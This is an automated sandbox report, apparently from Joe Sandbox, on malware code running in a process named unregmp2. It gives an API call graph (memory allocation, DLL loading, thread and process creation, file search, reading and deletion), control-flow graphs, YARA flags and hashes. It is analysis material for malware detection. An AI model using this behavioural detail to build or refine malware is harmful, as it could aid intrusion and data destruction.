95835->95836 95836->95793 95837->95818 95840 bdd2e6 95838->95840 95839 bdd2f3 95839->95827 95840->95839 95841 be9ed0 RtlFreeHeap 95840->95841 95842 bdd32c 95841->95842 95842->95827 95844 bd9976 95843->95844 95847 bdd340 95844->95847 95846 bd9a7c 95846->95830 95849 bdd364 95847->95849 95848 bdd3fc 95848->95846 95849->95848 95850 be9ed0 RtlFreeHeap 95849->95850 95850->95848 95683 be4fb0 95684 be500a 95683->95684 95685 be5017 95684->95685 95687 be2b40 95684->95687 95688 be9e40 NtAllocateVirtualMemory 95687->95688 95690 be2b81 95688->95690 95689 be2c86 95689->95685 95690->95689 95691 bd4410 LdrLoadDll 95690->95691 95693 be2bc7 95691->95693 95692 be2c00 Sleep 95692->95693 95693->95689 95693->95692 95694 bd582f 95695 bd5774 95694->95695 95695->95694 95696 bd584c 95695->95696 95697 bd5786 95695->95697 95698 be7650 LdrInitializeThunk 95695->95698 95701 be8080 95697->95701 95698->95697 95700 bd579b 95702 be8101 95701->95702 95704 be80a1 95701->95704 95706 4d42e80 LdrInitializeThunk 95702->95706 95703 be8132 95703->95700 95704->95700 95706->95703 95707 bc97a6 95709 bc974e 95707->95709 95710 bc97b0 95707->95710 95708 bc97a0 95709->95708 95711 bc978d CreateThread 95709->95711 95712 bca235 95710->95712 95713 be9b60 13 API calls 95710->95713 95713->95712 95714 bd6da0 95715 bd6dbc 95714->95715 95719 bd6e06 95714->95719 95717 be7fe0 NtClose 95715->95717 95715->95719 95716 bd6f2c 95718 bd6dd4 95717->95718 95724 bd61c0 NtClose LdrInitializeThunk LdrInitializeThunk 95718->95724 95719->95716 95725 bd61c0 NtClose LdrInitializeThunk LdrInitializeThunk 95719->95725 95721 bd6f06 95721->95716 95726 bd6390 NtClose LdrInitializeThunk LdrInitializeThunk 95721->95726 95724->95719 95725->95721 95726->95716 95851 bdeee0 95852 bdef44 95851->95852 95853 bd5f30 2 API calls 95852->95853 95855 bdf06d 95853->95855 95854 bdf074 95855->95854 95880 bd6040 95855->95880 95857 bdf213 95858 bdf0f0 95858->95857 95859 bdf222 95858->95859 95884 bdecc0 95858->95884 95860 be7fe0 NtClose 95859->95860 95863 bdf22c 95860->95863 95862 bdf125 95862->95859 95864 bdf130 95862->95864 95865 be9fb0 RtlAllocateHeap 95864->95865 95866 bdf159 95865->95866 95867 bdf178 95866->95867 95868 bdf162 95866->95868 95893 bdebb0 CoInitialize 95867->95893 95869 be7fe0 NtClose 95868->95869 95871 bdf16c 95869->95871 95872 bdf186 95895 be7ab0 95872->95895 95874 bdf202 95875 be7fe0 NtClose 95874->95875 95876 bdf20c 95875->95876 95877 be9ed0 RtlFreeHeap 95876->95877 95877->95857 95878 bdf1a4 95878->95874 95879 be7ab0 LdrInitializeThunk 95878->95879 95879->95878 95881 bd6065 95880->95881 95882 bd60d9 95881->95882 95899 be7940 95881->95899 95882->95858 95885 bdecdc 95884->95885 95886 bd4410 LdrLoadDll 95885->95886 95888 bdecfa 95886->95888 95887 bded03 95887->95862 95888->95887 95889 bd4410 LdrLoadDll 95888->95889 95890 bdedce 95889->95890 95891 bd4410 LdrLoadDll 95890->95891 95892 bdee2b 95890->95892 95891->95892 95892->95862 95894 bdec15 95893->95894 95894->95872 95896 be7acd 95895->95896 95904 4d42ba0 LdrInitializeThunk 95896->95904 95897 be7afd 95897->95878 95900 be795d 95899->95900 95903 4d42c60 LdrInitializeThunk 95900->95903 95901 be7991 95901->95882 95903->95901 95904->95897 95905 bd6f60 95906 bd6fd2 95905->95906 95907 bd6f78 95905->95907 95907->95906 95909 bdab60 95907->95909 95910 bdab86 95909->95910 95911 bdada5 95910->95911 95936 be83d0 95910->95936 95911->95906 95913 bdabfc 95913->95911 95914 beb0e0 2 API calls 95913->95914 95915 bdac18 95914->95915 95915->95911 95916 bdace9 95915->95916 95917 be7650 LdrInitializeThunk 95915->95917 95918 bd5640 LdrInitializeThunk 95916->95918 95920 bdad08 95916->95920 95919 bdac74 95917->95919 95918->95920 95919->95916 95922 bdac7d 95919->95922 95924 bdad8d 95920->95924 95942 be7220 95920->95942 95921 bdacd1 95925 bd7ad0 LdrInitializeThunk 95921->95925 95922->95911 95922->95921 95923 bdacaf 95922->95923 95939 bd5640 95922->95939 95957 be37f0 LdrInitializeThunk 95923->95957 95926 bd7ad0 LdrInitializeThunk 95924->95926 95930 bdacdf 95925->95930 95931 bdad9b 95926->95931 95930->95906 95931->95906 95932 bdad64 95947 be72c0 95932->95947 95934 bdad7e 95952 be7400 95934->95952 95937 be83ed 95936->95937 95938 be83fe CreateProcessInternalW 95937->95938 95938->95913 95941 bd567e 95939->95941 95958 be7810 95939->95958 95941->95923 95943 be7292 95942->95943 95944 be7244 95942->95944 95964 4d439b0 LdrInitializeThunk 95943->95964 95944->95932 95945 be72b7 95945->95932 95948 be7332 95947->95948 95949 be72e4 95947->95949 95965 4d44340 LdrInitializeThunk 95948->95965 95949->95934 95950 be7357 95950->95934 95953 be746f 95952->95953 95954 be7421 95952->95954 95966 4d42fb0 LdrInitializeThunk 95953->95966 95954->95924 95955 be7494 95955->95924 95957->95921 95959 be78af 95958->95959 95960 be7831 95958->95960 95963 4d42d10 LdrInitializeThunk 95959->95963 95960->95941 95961 be78f4 95961->95941 95963->95961 95964->95945 95965->95950 95966->95955 95727 be74a0 95728 be7521 95727->95728 95729 be74c1 95727->95729 95732 4d42ee0 LdrInitializeThunk 95728->95732 95730 be7552 95732->95730 95967 be7e60 95968 be7ef9 95967->95968 95970 be7e81 95967->95970 95969 be7f0f NtReadFile 95968->95969 95971 bd69d0 95972 bd69fa 95971->95972 95975 bd7900 95972->95975 95974 bd6a24 95976 bd791d 95975->95976 95982 be7740 95976->95982 95978 bd796d 95979 bd7974 95978->95979 95980 be7810 LdrInitializeThunk 95978->95980 95979->95974 95981 bd799d 95980->95981 95981->95974 95983 be77cd 95982->95983 95984 be7761 95982->95984 95987 4d42f30 LdrInitializeThunk 95983->95987 95984->95978 95985 be7806 95985->95978 95987->95985 95734 beb010 95735 be9ed0 RtlFreeHeap 95734->95735 95736 beb025 95735->95736 95988 be1150 95992 be115f 95988->95992 95989 be11ec 95990 be11a6 95991 be9ed0 RtlFreeHeap 95990->95991 95993 be11b6 95991->95993 95992->95989 95992->95990 95994 be11e7 95992->95994 95995 be9ed0 RtlFreeHeap 95994->95995 95995->95989 95739 bd958b 95740 bd959a 95739->95740 95741 bd95a1 95740->95741 95742 be9ed0 RtlFreeHeap 95740->95742 95742->95741 95743 bd8181 95744 bd8186 95743->95744 95745 bd8172 95743->95745 95744->95745 95747 bd6bf0 LdrInitializeThunk LdrInitializeThunk 95744->95747 95747->95745 95748 bdbe00 95750 bdbe29 95748->95750 95749 bdbf2d 95750->95749 95751 bdbed3 FindFirstFileW 95750->95751 95751->95749 95752 bdbeee 95751->95752 95753 bdbf14 FindNextFileW 95752->95753 95753->95752 95754 bdbf26 FindClose 95753->95754 95754->95749 95996 bd56c0 95997 bd7ad0 LdrInitializeThunk 95996->95997 95998 bd56f0 95996->95998 95997->95998 96000 bd571c 95998->96000 96001 bd7a50 95998->96001 96002 bd7a94 96001->96002 96007 bd7ab5 96002->96007 96008 be7360 96002->96008 96004 bd7aa5 96005 bd7ac1 96004->96005 96006 be7fe0 NtClose 96004->96006 96005->95998 96006->96007 96007->95998 96009 be73cf 96008->96009 96010 be7381 96008->96010 96013 4d44650 LdrInitializeThunk 96009->96013 96010->96004 96011 be73f4 96011->96004 96013->96011 96014 bd0a40 96015 bd0a5a 96014->96015 96016 bd4410 LdrLoadDll 96015->96016 96017 bd0a78 96016->96017 96018 bd0aac PostThreadMessageW 96017->96018 96019 bd0abd 96017->96019 96018->96019 96020 bdf7c0 96021 bdf7dd 96020->96021 96022 bd4410 LdrLoadDll 96021->96022 96023 bdf7fb 96022->96023 95765 be7600 95766 be761d 95765->95766 95769 4d42df0 LdrInitializeThunk 95766->95769 95767 be7645 95769->95767 95770 be7d00 95771 be7dac 95770->95771 95773 be7d28 95770->95773 95772 be7dc2 NtCreateFile 95771->95772 96024 be0dc0 96025 be0ddc 96024->96025 96026 be0e18 96025->96026 96027 be0e04 96025->96027 96029 be7fe0 NtClose 96026->96029 96028 be7fe0 NtClose 96027->96028 96030 be0e0d 96028->96030 96031 be0e21 96029->96031 96034 be9ff0 RtlAllocateHeap 96031->96034 96033 be0e2c 96034->96033 96035 be7f40 96036 be7fac 96035->96036 96038 be7f64 96035->96038 96037 be7fc2 NtDeleteFile 96036->96037

                  Executed Functions

                  Function 00BC97B0 Relevance: 54.3, Strings: 43, Instructions: 519COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 148 bc97b0-bc9c24 149 bc9c2e-bc9c35 148->149 150 bc9c5c-bc9c63 149->150 151 bc9c37-bc9c5a 149->151 152 bc9c8a-bc9c94 150->152 153 bc9c65-bc9c88 150->153 151->149 154 bc9ca5-bc9cb1 152->154 153->150 155 bc9ccf-bc9cd9 154->155 156 bc9cb3-bc9cbf 154->156 159 bc9cea-bc9cf4 155->159 157 bc9ccd 156->157 158 bc9cc1-bc9cc7 156->158 157->154 158->157 161 bc9d0a-bc9d11 159->161 162 bc9cf6-bc9d08 159->162 164 bc9d18-bc9d1c 161->164 162->159 165 bc9d1e-bc9d48 164->165 166 bc9d4a-bc9d54 164->166 165->164 167 bc9d65-bc9d71 166->167 168 bc9d88-bc9d99 167->168 169 bc9d73-bc9d86 167->169 170 bc9daa-bc9db3 168->170 169->167 172 bc9db5-bc9dc4 170->172 173 bc9dc6-bc9dcf 170->173 172->170 174 bca118-bca122 173->174 175 bc9dd5-bc9ddf 173->175 178 bca133-bca13c 174->178 177 bc9df0-bc9dfc 175->177 179 bc9e0c-bc9e10 177->179 180 bc9dfe-bc9e0a 177->180 181 bca13e-bca14e 178->181 182 bca15b-bca162 178->182 184 bc9e39-bc9e43 179->184 185 bc9e12-bc9e37 179->185 180->177 186 bca159 181->186 187 bca150-bca156 181->187 188 bca168-bca16f 182->188 189 bca272-bca27c 182->189 192 bc9e54-bc9e5d 184->192 185->179 186->178 187->186 190 bca194-bca19b 188->190 191 bca171-bca187 188->191 196 bca19d-bca1af 190->196 197 bca1c5-bca1cf 190->197 194 bca189-bca18f 191->194 195 bca192 191->195 198 bc9e5f-bc9e6b 192->198 199 bc9e7b-bc9e82 192->199 194->195 195->188 202 bca1b6-bca1b8 196->202 203 bca1b1-bca1b5 196->203 204 bca1e0-bca1e9 197->204 205 bc9e6d-bc9e73 198->205 206 bc9e79 198->206 200 bc9eb4-bc9ebe 199->200 201 bc9e84-bc9eb2 199->201 208 bc9ecf-bc9edb 200->208 201->199 209 bca1ba-bca1c0 202->209 210 bca1c3 202->210 203->202 211 bca1ff-bca20b 204->211 212 bca1eb-bca1fd 204->212 205->206 206->192 213 bc9edd-bc9eef 208->213 214 bc9ef1-bc9ef8 208->214 209->210 210->190 216 bca20d-bca22e 211->216 217 bca230 call be9b60 211->217 212->204 213->208 220 bc9f4a-bc9f4d 214->220 221 bc9efa-bc9f1a 214->221 216->211 222 bca235-bca23f 217->222 225 bc9f53-bc9f5a 220->225 223 bc9f1c-bc9f20 221->223 224 bc9f21-bc9f23 221->224 226 bca250-bca25c 222->226 223->224 227 bc9f34-bc9f48 224->227 228 bc9f25-bc9f2e 224->228 229 bc9f5c-bc9f8f 225->229 230 bc9f91-bc9f9e 225->230 226->189 232 bca25e-bca270 226->232 227->214 228->227 229->225 231 bc9fa4-bc9fab 230->231 233 bc9fdc-bc9feb 231->233 234 bc9fad-bc9fda 231->234 232->226 236 bc9fed 233->236 237 bc9ff2-bc9ffe 233->237 234->231 236->174 238 bca000-bca021 237->238 239 bca023-bca02d 237->239 238->237 240 bca02f-bca04e 239->240 241 bca061-bca06b 239->241 242 bca05f 240->242 243 bca050-bca059 240->243 244 bca07c-bca088 241->244 242->239 243->242 245 bca08a-bca099 244->245 246 bca09b-bca0a5 244->246 245->244 247 bca0b6-bca0bf 246->247 249 bca0cf-bca0e3 247->249 250 bca0c1-bca0cd 247->250 252 bca0f4-bca100 249->252 250->247 253 bca102-bca111 252->253 254 bca113 252->254 253->252 254->173
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !'k$"X$#N$#z$'$'r$)$+`$-Q$/$2u)$6Z$:$<l$B?xC$E$H$H$J$M-$P$PT$S$[$\U$]$]$c$cq$d$fT$gu$h$k$l!$p$q8$xC$y${$|$'$0
                  • API String ID: 0-4036846436
                  • Opcode ID: b9ed47ec20846162d8bc5eaf255e7fb66eb45b076eba6e3f18f89ca098c3f39c
                  • Instruction ID: 34348155984ae45c4ce2581d7b8c2d4b73c218062c92883787775ece165f0990
                  • Opcode Fuzzy Hash: b9ed47ec20846162d8bc5eaf255e7fb66eb45b076eba6e3f18f89ca098c3f39c
                  • Instruction Fuzzy Hash: 76529FB0D05229CBEB64CF44C898BDDBBB2BB45308F1481D9D14D6B290CBB95AC9DF46
                  Function 00BDBE00 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 00BDBEE4
                  • FindNextFileW.KERNELBASE(?,00000010), ref: 00BDBF1F
                  • FindClose.KERNELBASE(?), ref: 00BDBF2A
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: bb53c66e9415eef9ed8cfac4a92c5182dcff2baf30a16be2c8494ab4df996999
                  • Instruction ID: 436bb153342d64a76a78de24f4ce74382c53a7401cf2b0809b205ede8fe1495d
                  • Opcode Fuzzy Hash: bb53c66e9415eef9ed8cfac4a92c5182dcff2baf30a16be2c8494ab4df996999
                  • Instruction Fuzzy Hash: 4A3150B5900348BBDB20DB65CC85FEF77BCDB44744F144599B509A7281EB70AA848BA0
                  Function 00BE7D00 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00BE7DF3
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ecfe109843e6adbc9789653d124c6213f17cb6b4317e9cde925e34fe65ab8720
                  • Instruction ID: 8ca4be4e8ed4eca7a4c54b38f8dbd649e51098f8fcb22e34796b3401bd194709
                  • Opcode Fuzzy Hash: ecfe109843e6adbc9789653d124c6213f17cb6b4317e9cde925e34fe65ab8720
                  • Instruction Fuzzy Hash: C631E1B5A01208AFCB14DF99D881EEFB7F9AF8C304F108259F918A3341D770A911CBA4
                  Function 00BE7E60 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00BE7F38
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 4b475c96b3670da1695345ff90d445bc7f9a6db3ada86ecf4cb7af92aad584dd
                  • Instruction ID: 19dc2d0212f27e51b397ad45d5ad6b815be451aee91fbd3a0991d89510494e80
                  • Opcode Fuzzy Hash: 4b475c96b3670da1695345ff90d445bc7f9a6db3ada86ecf4cb7af92aad584dd
                  • Instruction Fuzzy Hash: 4D31E4B5A00209AFCB14DF99D881EEFB7F9EF88314F108259F918A7241D730A9118BA4
                  Function 00BE8140 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00BD199E,?,00BE6D77,00000000,00000004,00003000,?,?,?,?,?,00BE6D77,00BD199E,00BE6D77,00000000), ref: 00BE81FD
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 4c0ce185ad5d200ae9320498b354b4f0915c368f0ac16ab7953bcb79e85fabda
                  • Instruction ID: 64c320720a0de41df861a2c0d802f212fbff6a49da5f69fd903452403c302b64
                  • Opcode Fuzzy Hash: 4c0ce185ad5d200ae9320498b354b4f0915c368f0ac16ab7953bcb79e85fabda
                  • Instruction Fuzzy Hash: AD2105B5A01248AFDB14EF59DC81FAFB7B9EF89310F008549FD18A7241D770A911CBA5
                  Function 00BE7F40 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: 8f29438b34e29164e242ffc256c12d18e8e931696d74641c76c59d00643db24c
                  • Instruction ID: 898182c7e9ae2b5f45db4a96e65dd92c1e86e1df12d89700bab80532f57a7919
                  • Opcode Fuzzy Hash: 8f29438b34e29164e242ffc256c12d18e8e931696d74641c76c59d00643db24c
                  • Instruction Fuzzy Hash: 8501A171A012447FD624EA69DC02FAB77ACDFC5310F404489FA089B282DBB17904CBE1
                  Function 00BE7FE0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00BE8017
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
                  • Instruction ID: 126c8adfaffc1d6a4d7a636394f6847d3153ae11f4126aaba4c2142ebe1b6f1e
                  • Opcode Fuzzy Hash: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
                  • Instruction Fuzzy Hash: 28E046326012447BE220EA5ACC01FABB7ACDBC6721F418459FA08A7242CA71B91187E0
                  Function 04D44650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: fad39badb14ec4d516f1b4b17ca3873e1c5b535447f6c7dd1f33782914d97ae5
                  • Instruction ID: 8db2d607b9f6c1566cce7b8f087954a54fcd29c2e6e8fb771080b269254e71d2
                  • Opcode Fuzzy Hash: fad39badb14ec4d516f1b4b17ca3873e1c5b535447f6c7dd1f33782914d97ae5
                  • Instruction Fuzzy Hash: A39002616015004266407158480440660159BE1305395C115B4559671C8A18D965A669
                  Function 04D44340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5d0beda3f29a5baf8d45b2211c2cc677f410747935221b6c099e2e3807cc9ad6
                  • Instruction ID: 10dc399bb2a08e0466f4100077e84f2d5104a6acf85573e28d0b73b06827454d
                  • Opcode Fuzzy Hash: 5d0beda3f29a5baf8d45b2211c2cc677f410747935221b6c099e2e3807cc9ad6
                  • Instruction Fuzzy Hash: 8090023160580012B6407158488454640159BE0305B55C011F4429665C8E14DA666761
                  Function 04D42CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5d65dfceaa93c1f84dfbeb069d150977d13268ddaef011d591950d5f9230f410
                  • Instruction ID: 252b4ecef969e1f9468a4d8d5e4be176a5b4ef823a557428a8d445f283e72e9d
                  • Opcode Fuzzy Hash: 5d65dfceaa93c1f84dfbeb069d150977d13268ddaef011d591950d5f9230f410
                  • Instruction Fuzzy Hash: 4A90023120140402F6007598540864600158BE0305F55D011B9029666ECA65D9A17531
                  Function 04D42C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d8efcf47522231a4f64aa841169cf71ca98dcf602c0687ce7fba558aa5ff851c
                  • Instruction ID: fc09fc4a365883d2d6378bf907eb2f08e07fa7df800a9eb51eb6b4502da180d9
                  • Opcode Fuzzy Hash: d8efcf47522231a4f64aa841169cf71ca98dcf602c0687ce7fba558aa5ff851c
                  • Instruction Fuzzy Hash: CF90023120148802F6107158840474A00158BD0305F59C411B8429769D8A95D9A17521
                  Function 04D42C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 6cc56fef1f9c7bce039937f1dd0cf4789fa646039ef7062d8a3fc64d250f9b7c
                  • Instruction ID: 5836a20f004cd3ea51c668ab748037393e616a5b8b4b71f487e9c76cd5dd4075
                  • Opcode Fuzzy Hash: 6cc56fef1f9c7bce039937f1dd0cf4789fa646039ef7062d8a3fc64d250f9b7c
                  • Instruction Fuzzy Hash: CE90023120140842F60071584404B4600158BE0305F55C016B4129765D8A15D9617921
                  Function 04D42DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 308a6bb29ce6c40a65c2e36fee669ed472aaf6e1eaa7bda4add9a6a907666206
                  • Instruction ID: 8b565e02602531a39735dc669ffdd6ff474b5402a4122c92b6a22ad84ca0fa8b
                  • Opcode Fuzzy Hash: 308a6bb29ce6c40a65c2e36fee669ed472aaf6e1eaa7bda4add9a6a907666206
                  • Instruction Fuzzy Hash: 2B900221242441527A45B158440450740169BE0245795C012B5419A61C8926E966EA21
                  Function 04D42DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: fb876fcde40cec3efc6302f45a3f14f2d5a5e737214ee00e16bf8ddcfe8ce6aa
                  • Instruction ID: 255c6599a54d8ace183c20039e4fbdc48f4be3e5417e6b174eb18ce53d436d95
                  • Opcode Fuzzy Hash: fb876fcde40cec3efc6302f45a3f14f2d5a5e737214ee00e16bf8ddcfe8ce6aa
                  • Instruction Fuzzy Hash: 7A90023120140413F6117158450470700198BD0245F95C412B4429669D9A56DA62B521
                  Function 04D42D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: f009e18c18db38af58981b02b33933d8311b0b1df54b6d583df88c75fc3940a6
                  • Instruction ID: af0e2fccd3ceae1eb08075900f021a2240c9b158c09d01e4f69e1c9f82929b7d
                  • Opcode Fuzzy Hash: f009e18c18db38af58981b02b33933d8311b0b1df54b6d583df88c75fc3940a6
                  • Instruction Fuzzy Hash: C790022921340002F6807158540860A00158BD1206F95D415B401A669CCD15D9796721
